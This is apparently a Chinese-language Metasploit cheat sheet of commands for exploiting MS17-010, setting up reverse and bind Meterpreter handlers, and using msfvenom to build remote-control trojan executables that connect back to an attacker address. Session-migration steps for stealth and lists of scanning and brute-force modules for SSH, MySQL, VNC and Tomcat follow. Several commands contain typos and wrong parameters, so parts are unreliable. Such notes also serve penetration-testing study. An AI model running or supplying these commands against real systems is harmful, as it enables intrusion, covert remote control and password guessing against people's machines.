msfconsole #打开msf控制台,以便于进行下一步的操作
reload_all
search ms17-010 #搜索所有有关于ms17-010的模块
use 0 #使用编号为1的模块,也可以直接使用名字
options #查看相应模块的配置信息
set rhosts ip #设置目标主机的IP
set rpost port #设置要连接的目标主机端口
set lhost ip #设置攻击机的ip
set lport port #设置攻击机开启的监听端口
set payload windows/x64/meterpreter/reverse_tcp #针对于Windows使用反弹shell模块,使目标机器连接到攻击机的msf上
set payload windows/x64/meterpreter/bind_tcp #针对于Windows使用监听模块,是攻击机连接到目标机的端口上
set autorunscript migrate -n explorer.exe #将msf的获取的会话自动迁移到系统进程explorer.exe上,增强隐蔽性
run-j-z #在后台运行模块,并持续监听
sessions #查看已经上线的会话
sessions 3 #进入会话3
session -k 1 #杀死会话1
kill session 1 #杀死会话1
session -K killall ##杀死所有会话
#方法1:先进入控制台,再一步一步操作
msfconsole # 进入 Metasploit 控制台
use exploit/multi/handler # 使用通用监听模块,以处理反向连接
set payload windows/x64/meterpreter/reverse_tcp # 针对 Windows 系统,使用反弹 Shell 模块
set lhost 0.0.0.0 # 0.0.0.0 代表攻击机的所有网卡 IP
set lport 10000 # 指定 攻击机的Metasploit 监听的端口为 10000,等待目标连接
run -j -z # 后台运行模块,并持续监听指定端口
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.249 port=10000 -f exe -o Desktop\rev.exe
#直接生成远控木马(exe文件),需要在目标主机上执行
#方法2:先进入控制台,然后直接生成
msfconsole
handler -H 0.0.0.0 -P 10000 -p windows/x64/meterpreter/reverse_tcp #设置处理程序以接收反向连接
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.100.249 port=10000 #直接生成圆孔木马(exe文件)
(2). 通过监听方式
攻击者主动连接目标,适合能够直接访问目标的情况
#方法1:
msfconsole
use exploit/multi/handler #通用监听模块
set payload windows/x64/meterpreter/bind tcp #使用bind模块
set rhost 192.168.100.223 #192.168.100.223 代表msf要正向连接到目标的IP,也就是目标机器的IP
set lport 5555 #指定目标机器开放的端口,方便攻击机通过该端口连接目标机器
run -j-z #后台运行模块,并持续监听端口
msfvenom -p windows/x64/meterpreter/bind_tcp lport=5555 -f exe -o Desktop\bind.exe
#生成远控木马,需在目标机上执行
#方法2:
hanler -H 192.168.100.223 -P 5555 -p windows/x64/meterpreter/bind_tcp
msfvenom -p windows/x64/meterpreter/bind_tcp lport=5555 -f exe -o Desktop\bind.exe
3. 常用模块
具体使用方法,进入控制台后,使用options查看具体用法
(1). 信息收集
use auxiliary/scanner/discovery/arp_sweep # arp 扫描
use auxiliary/scancer/smb/smb_version #存活的 445 主机
use auxiliary/scanner/portscan/syn # syn端口扫描
use auxiliary/scanner/portscan/tcp #TCP 端口扫描
use auxiliary/scanner/telnet/telnet_version # telent 服务扫描
use auxiliary/scanner/rdp/rdp_scanner # 远程桌面服务扫描
use auxiliary/scanner/ssh/ssh_version #ssh 主机扫描
use auxiliary/scanner/smb/smb_version # smb 服务扫描
use auxiliary/scanner/ip/ipidseq # IPID 序列扫描器
use auxiliary/scanner/mssql/mssql_ping #mssg
use auxiliary/scanner/http/webdav_scanner # webdav
(2). 爆破
use auxiliary/scanner/mysql/mysql_login # 爆破 mysql
use auxiliary/scanner/mssql/mssql_login # 爆破 mssqL
use auxiliary/scanner/ssh/ssh_login # 爆破 SSH
use auxiliary/scanner/snmp/snmp_enum #枚举snmp
use auxiliary/scanner/vnc/vnc_login #爆破 VNC
use auxiliary/scanner/http/tomcat_mgr_login # 爆破 tomcat